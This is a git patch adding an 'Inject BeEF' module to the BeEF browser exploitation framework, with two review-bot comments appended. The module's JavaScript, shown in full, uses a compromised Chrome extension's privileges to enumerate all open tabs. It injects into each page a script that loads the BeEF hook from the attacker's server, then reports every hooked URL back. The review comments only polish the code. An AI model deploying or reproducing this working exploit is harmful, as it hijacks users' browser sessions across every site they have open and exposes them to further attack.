From 8037d46d94bd19da0698bf6dd7ec8f90cc2e6283 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Sun, 25 Sep 2011 13:08:29 +0000
Subject: [PATCH] (Fixes issue 507): added Chrome extension exploit that injects the BeEF hook on all the available tabs. Works great!
git-svn-id: https://beef.googlecode.com/svn/trunk@1309 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
.../chrome_extensions/inject_beef/command.js | 26 +++++++++++++++++++
.../chrome_extensions/inject_beef/config.yaml | 10 +++++++
.../chrome_extensions/inject_beef/module.rb | 9 +++++++
3 files changed, 45 insertions(+)
create mode 100755 modules/chrome_extensions/inject_beef/command.js
create mode 100755 modules/chrome_extensions/inject_beef/config.yaml
create mode 100755 modules/chrome_extensions/inject_beef/module.rb
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js
new file mode 100755
index 000000000..7dc843abf
--- /dev/null
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -0,0 +1,26 @@ +beef.execute(function() { + + var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + + chrome.windows.getAll({"populate" : true}, function(windows) { + for(i in windows) { + if(windows[i].type=="normal") { + chrome.tabs.getAllInWindow(windows[i].id,function(tabs){ + for(t in tabs) { + //antisnatchor: if the extension has her own tabs open, we want to precent injecting the hook + //also there. Chrome extensions with tabs and http/s permissions cannot access URIs with protocol + // handlers chrome-extension://, and most of them will not have permissions to do so. + if(tabs[t].url.substring(0,16) != "chrome-extension"){ + chrome.tabs.executeScript(tabs[t].id,{code:"newScript=document.createElement('script'); newScript.src='" + + beefHookUri + "'; newScript.setAttribute('onload','beef_init()'); document.getElementsByTagName('head')[0].appendChild(newScript);"}) + + //send back the new domain that will be hooked :-) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Succesfully injected BeEF hook on: ' + tabs[t].url); + } + } + }) + } + } + }); +}); + diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml new file mode 100755 index 000000000..73be08789 --- /dev/null +++ b/modules/chrome_extensions/inject_beef/config.yaml @@ -0,0 +1,10 @@ +beef: + module: + inject_beef: + enable: true + category: "Chrome Extensions" + name: "Inject BeEF" + description: "Attempt to inject the BeEF hook on all the available tabs." + authors: ["Kos", "antisnatchor"] + target: + working: ["C"] diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb new file mode 100755 index 000000000..3397f82a6 --- /dev/null +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -0,0 +1,9 @@ +class Inject_beef < BeEF::Core::Command + + def post_execute + content = {} + content['Return'] = @datastore['return'] + save content + end + +end
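Review bot: In command.js the loop variables `i` and `t` (and `newScript` inside the injected string) are never declared, so they become implicit globals, and `for…in` over the `windows` and `tabs` arrays also visits any enumerable property added to `Array.prototype`; indexed loops such as `for (var i = 0; i < windows.length; i++)` and `var newScript = …` avoid both. The result message is sent right after `chrome.tabs.executeScript` is called, not from its callback, so each log entry records an attempt rather than a confirmed outcome and should be worded that way, e.g. `'Attempted BeEF hook injection on: '`, which also matches the "Attempt to inject" description in config.yaml. The block comment has the typo "precent" for "prevent" and would be clearer if it named the extension permissions the module depends on.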
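Review bot: `post_execute` in module.rb copies `@datastore['return']` into the saved result without any validation, and the value originates from the hooked browser (command.js sends the tab URL), so it has to be treated as untrusted wherever the stored result is later displayed; that rendering code is outside this diff, so confirm it escapes the value. The visible `beef.net.send` call passes a bare string with no `return=` key, so it is worth checking that the framework actually populates `@datastore['return']` for this module, otherwise `content['Return']` will be nil. A one-line comment above `post_execute` stating what the field holds, e.g. `# stores the text reported by the hooked browser (URL of each tab the command touched)`, would document this.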